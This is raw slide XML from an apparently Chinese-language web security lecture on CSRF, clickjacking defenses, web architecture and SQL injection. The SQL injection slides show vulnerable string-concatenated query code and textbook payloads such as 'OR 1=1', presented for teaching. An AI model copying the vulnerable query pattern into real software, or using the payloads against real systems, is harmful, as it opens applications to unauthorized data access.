              <a:t>框架自带的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSRF token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自动实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>插入和检查的功能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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>总结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通常需要受害者进行操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者看不到整个过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的区别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，客户端信任服务器，然而。。。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，服务器信任客户端，然而。。。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>confused deputy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击的经典案例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>诱导应用做一些可以做但不应当做的事情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点击劫持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599" y="2941983"/>
            <a:ext cx="8536343" cy="3108653"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>点击劫持（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>），或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>UI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>重定向</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者的网站通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加载了目标网站</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实际上目标网站的上层叠加了攻击者的透明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用户认为自己正在和可见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>交互</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>但是。。。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>诱导用户做一些不想做的事情，如</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>点赞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>likejacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="clickjackin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26412" y="520505"/>
            <a:ext cx="5584288" cy="22804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198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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3656"/>
              <a:t>消息</a:t>
            </a:r>
            <a:endParaRPr sz="3656" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="97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772974" y="1851158"/>
            <a:ext cx="4427676" cy="3366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asted-imag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5061502" y="1971058"/>
            <a:ext cx="4427676" cy="324698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BAFD45-F718-4814-9702-9E90BA914E57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918252" y="56515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客户端请求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F81911-6067-4A36-BA63-CA607039312E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6345928" y="56515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SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>服务端响应</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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75230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预防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Clickjacking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zh-CN" altLang="en-US"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>framebusting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-68192">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="813" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="367759">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="278606" algn="l"/>
                <a:tab pos="567531" algn="l"/>
                <a:tab pos="856456" algn="l"/>
                <a:tab pos="1135063" algn="l"/>
                <a:tab pos="1423988" algn="l"/>
                <a:tab pos="1712913" algn="l"/>
                <a:tab pos="2001838" algn="l"/>
                <a:tab pos="2280444" algn="l"/>
                <a:tab pos="2569369" algn="l"/>
                <a:tab pos="2858294" algn="l"/>
                <a:tab pos="3136900" algn="l"/>
                <a:tab pos="3425825" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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(top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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!=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self) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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top.location.replace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(location);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-68192">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="813" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>anti-framing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>security headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>防止网页被攻击者嵌入frame中使用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-68192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37C45-25A9-D048-969E-0571BDB86F25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="4538786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X-Frame-Options: DENY | SAMEORIGIN | ALLOW-FROM origin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35561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攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务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Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CGI Shell Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17611555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Elbow Connector 54"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="1"/>
            <a:endCxn id="50" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1217875" y="4367065"/>
            <a:ext cx="1022251" cy="1259199"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 37639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1" idx="1"/>
            <a:endCxn id="20" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="2083449" y="3709794"/>
            <a:ext cx="733663" cy="1103133"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26005"/>
              <a:gd name="adj2" fmla="val 83864"/>
            </a:avLst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Web架构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85" y="2497216"/>
            <a:ext cx="725925" cy="72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5040" y="1873179"/>
            <a:ext cx="4490843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客户端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7295" y="1873823"/>
            <a:ext cx="2727246" cy="392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服务端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5337" y="1873179"/>
            <a:ext cx="1942505" cy="3924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Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>协议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950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5337" y="3410247"/>
            <a:ext cx="1942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FTP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HTTP 1.0/1.1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HTTP 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>SSL and TLS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Websocket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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815" y="3498384"/>
            <a:ext cx="1146929" cy="163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文档建模和渲染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83449" y="3498384"/>
            <a:ext cx="1467326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HTML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解析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37" y="4819893"/>
            <a:ext cx="848200" cy="848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rot="5400000">
            <a:off x="3940330" y="4160392"/>
            <a:ext cx="1840242" cy="3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网络协议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6017175" y="4160392"/>
            <a:ext cx="1840242" cy="3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网络协议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17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3550775" y="3709794"/>
            <a:ext cx="115444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3661" y="3395506"/>
            <a:ext cx="72648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HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Elbow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1400721" y="3709794"/>
            <a:ext cx="682728" cy="445861"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3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83449" y="4812927"/>
            <a:ext cx="1467326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CSS </a:t>
            </a:r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解析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40125" y="4155655"/>
            <a:ext cx="1154441" cy="42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mic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>JS Runtime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394566" y="4356622"/>
            <a:ext cx="1310650" cy="72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36301" y="4056540"/>
            <a:ext cx="43954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JS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50775" y="5047069"/>
            <a:ext cx="115444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76189" y="4739726"/>
            <a:ext cx="55976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CSS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988949" y="3921205"/>
            <a:ext cx="233" cy="23445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1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1383744" y="4615447"/>
            <a:ext cx="699706" cy="408891"/>
          </a:xfrm>
          <a:prstGeom prst="bent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1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1384822" y="4367066"/>
            <a:ext cx="855303" cy="7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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402683" y="5267424"/>
            <a:ext cx="815192" cy="7176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>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>存储</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1463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52" name="Elbow Connector 51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2749852" y="3703771"/>
            <a:ext cx="578622" cy="3642576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84358" y="5508527"/>
            <a:ext cx="84670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3" b="1" dirty="0">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Cookies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87" y="2367449"/>
            <a:ext cx="816747" cy="816747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7470400" y="3410248"/>
            <a:ext cx="1268432" cy="145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25">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>应用程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="162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(Java, PHP, Python, Node, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r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)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Flowchart: Magnetic Disk 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8922562" y="3011305"/>
            <a:ext cx="870480" cy="768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3">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1463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68" name="Straight Arrow Connector 67"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="66" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092530" y="4136241"/>
            <a:ext cx="37786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12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092530" y="5047070"/>
            <a:ext cx="1842206" cy="196923"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3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6" idx="3"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8738832" y="4136241"/>
            <a:ext cx="620005" cy="683651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6" idx="3"/>
            <a:endCxn id="67" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8738831" y="3779706"/>
            <a:ext cx="618971" cy="356536"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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2658412" y="3917289"/>
            <a:ext cx="4514" cy="23370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064384" y="4578476"/>
            <a:ext cx="233" cy="23445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8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899138"/>
            <a:ext cx="7795591" cy="1631853"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="330613">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="247650" algn="l"/>
                <a:tab pos="505619" algn="l"/>
                <a:tab pos="763588" algn="l"/>
                <a:tab pos="1021556" algn="l"/>
                <a:tab pos="1279525" algn="l"/>
                <a:tab pos="1537494" algn="l"/>
                <a:tab pos="1795463" algn="l"/>
                <a:tab pos="2053431" algn="l"/>
                <a:tab pos="2311400" algn="l"/>
                <a:tab pos="2569369" algn="l"/>
                <a:tab pos="2827338" algn="l"/>
                <a:tab pos="3085306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SELECT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en-US" sz="195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, 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admin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FROM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users;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="330613">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="247650" algn="l"/>
                <a:tab pos="505619" algn="l"/>
                <a:tab pos="763588" algn="l"/>
                <a:tab pos="1021556" algn="l"/>
                <a:tab pos="1279525" algn="l"/>
                <a:tab pos="1537494" algn="l"/>
                <a:tab pos="1795463" algn="l"/>
                <a:tab pos="2053431" algn="l"/>
                <a:tab pos="2311400" algn="l"/>
                <a:tab pos="2569369" algn="l"/>
                <a:tab pos="2827338" algn="l"/>
                <a:tab pos="3085306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INSERT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INTO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users(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VALUES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'admin'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330613">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="247650" algn="l"/>
                <a:tab pos="505619" algn="l"/>
                <a:tab pos="763588" algn="l"/>
                <a:tab pos="1021556" algn="l"/>
                <a:tab pos="1279525" algn="l"/>
                <a:tab pos="1537494" algn="l"/>
                <a:tab pos="1795463" algn="l"/>
                <a:tab pos="2053431" algn="l"/>
                <a:tab pos="2311400" algn="l"/>
                <a:tab pos="2569369" algn="l"/>
                <a:tab pos="2827338" algn="l"/>
                <a:tab pos="3085306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UPDATE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users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SET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'...'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WHERE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'admin'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  <a:p>
            <a:pPr marL="0" indent="0" defTabSz="330613">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="247650" algn="l"/>
                <a:tab pos="505619" algn="l"/>
                <a:tab pos="763588" algn="l"/>
                <a:tab pos="1021556" algn="l"/>
                <a:tab pos="1279525" algn="l"/>
                <a:tab pos="1537494" algn="l"/>
                <a:tab pos="1795463" algn="l"/>
                <a:tab pos="2053431" algn="l"/>
                <a:tab pos="2311400" algn="l"/>
                <a:tab pos="2569369" algn="l"/>
                <a:tab pos="2827338" algn="l"/>
                <a:tab pos="3085306" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pP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DELETE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FROM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users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327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WHERE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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/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7F7F7F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'admin'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menl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92348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SQL注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：登录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D2E8C-FA18-8946-B2EB-F8D345EBDBC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1993172"/>
            <a:ext cx="8083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txtUserId = getRequestString("UserId");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-HK"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-HK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txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;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DA6731-3F93-CC4D-94B1-7812CAE192F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1006426" y="2652786"/>
            <a:ext cx="619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b="0" i="0" u="none" strike="noStrike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 * FROM Users WHERE UserId = 105 OR 1=1;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0BD62-017A-AE47-8DDE-B86B55B827D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974774" y="6356492"/>
            <a:ext cx="549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omic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>https://www.w3schools.com/sql/sql_injection.asp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470898-9B38-8148-ADA6-B22F203A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26" y="1353258"/>
            <a:ext cx="3327400" cy="62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088626-16C0-7448-A769-CA990F99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4" y="3075686"/>
            <a:ext cx="2370377" cy="15084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FB0952-4D83-0647-AB38-9684E58F8156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926878" y="5805973"/>
            <a:ext cx="8664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b="0" i="0" u="none" strike="noStrike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 * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""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5E664-94C4-9F4B-97DF-5E3BA9AA411C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="938661" y="4605644"/>
            <a:ext cx="7004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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uName = getRequestString("username");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-HK">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-HK">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uPass = getRequestString("userpassword");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-HK">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-HK">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sql = 'SELECT * FROM Users WHERE Name ="' + uName </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-HK">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       + '"  AND Pass ="' + uPass + '"'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461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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入示例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86339"/>
            <a:ext cx="8719930" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"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zh-CN" altLang="en-US" sz="1950" b="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>网页中的原始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1950" b="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1950" b="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>脚本：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" b="1" dirty="0">
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr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ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>“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SELECT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name, description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FROM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items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WHERE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id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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>”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ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>req.args.get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‘id’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,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‘’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)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> + “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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="35A327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950" dirty="0">
              <a:solidFill>
